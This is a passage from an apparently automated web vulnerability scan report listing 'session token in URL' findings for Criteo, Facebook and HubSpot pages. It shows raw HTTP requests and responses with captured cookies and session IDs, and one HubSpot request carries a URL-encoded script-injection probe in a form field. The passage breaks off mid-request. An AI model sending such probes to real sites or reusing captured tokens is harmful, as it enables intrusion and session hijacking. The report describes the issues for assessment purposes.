Host: www.invisionpower.com
Connection: keep-alive
Referer: http://www.invisionpower.com/hosting/advanced.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; maan_session_id=f9add250757a37960635a0e30677ab16; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.4.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:28:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: maan_session_id=a4533e26a4bb6bff0bf247e222ebe94c; path=/; domain=invisionpower.com; httponly
Set-Cookie: PHPSESSID=d0f3d69516c661d8737579de7244be22; path=/
Expires: Sat, 14 May 2011 16:28:42 GMT
Cache-Control: no-cache,must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 26115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type=
...[SNIP]...

8. Session token in URL previous next
There are 3 instances of this issue:

http://www.criteo.com/index.php
http://www.facebook.com/extern/login_status.php
http://www.hubspot.com/free-trial/Default.aspx

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://www.criteo.com/index.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.criteo.com
Path:	/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.irce2011.com/2011/agenda/detail.asp?sess_id=419

Request

GET /index.php HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:56:13 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0ecea38193df0c9bab184bf1b140820e=fc36890f7569e961d051a8f498e5034a; path=/
Set-Cookie: lang=deleted; expires=Saturday, 15-May-10 16:56:12 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Saturday, 15-May-10 16:56:12 GMT; path=/
Set-Cookie: jfcookie[lang]=us; expires=Monday, 16-May-11 16:56:13 GMT; path=/
Last-Modified: Sun, 15 May 2011 16:56:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">

   <head>


...[SNIP]...
<h4 style="text-align: center;">Join Criteo at <a target="_blank" title="IRCE 2011 Criteo" href="http://www.irce2011.com/2011/agenda/detail.asp?sess_id=419">IRCE 2011</a>
...[SNIP]...
<p style="text-align: center;"><a target="_parent" title="IRCE 2011 Criteo" href="http://www.irce2011.com/2011/agenda/detail.asp?sess_id=419"><img src="/images/banners/en-us/irce2011_logo.jpg" alt="irce2011_logo" height="85" width="170" />
...[SNIP]...

8.2. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=167973672925&app_id=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2416bc7b4%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1d11b331c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df143a7ae94%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1ed49306c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3891a53bc%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=167973672925&app_id=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2416bc7b4%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1d11b331c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df143a7ae94%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1ed49306c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3891a53bc%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff3f3e8fc48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a7b7904&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f1ed49306c&origin=http%3A%2F%2Fcommunity.invisionpower.com%2Ff3f3e8fc48&relation=parent&transport=postmessage&frame=f1a7b7904
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.55.55
X-Cnection: close
Date: Sun, 15 May 2011 16:26:41 GMT
Content-Length: 0

8.3. http://www.hubspot.com/free-trial/Default.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.hubspot.com
Path:	/free-trial/Default.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyhttp://burp/show/4NDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0D&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0D&LeadGen_ContactForm_10273_m66219%3aLastName=%0D&LeadGen_ContactForm_10273_m66219%3aEmail=%0D&LeadGen_ContactForm_10273_m66219%3aPhone=%0D&LeadGen_ContactForm_10273_m66219%3aCompany=%0D&LeadGen_ContactForm_10273_m66219%3aWebsite=%0D&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0D16368%3Cscript%3Ealert(/DORK/)%3C%2fscript%3E396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0D&__dnnVariable=%0D&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Request

GET /free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyhttp://burp/show/4NDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC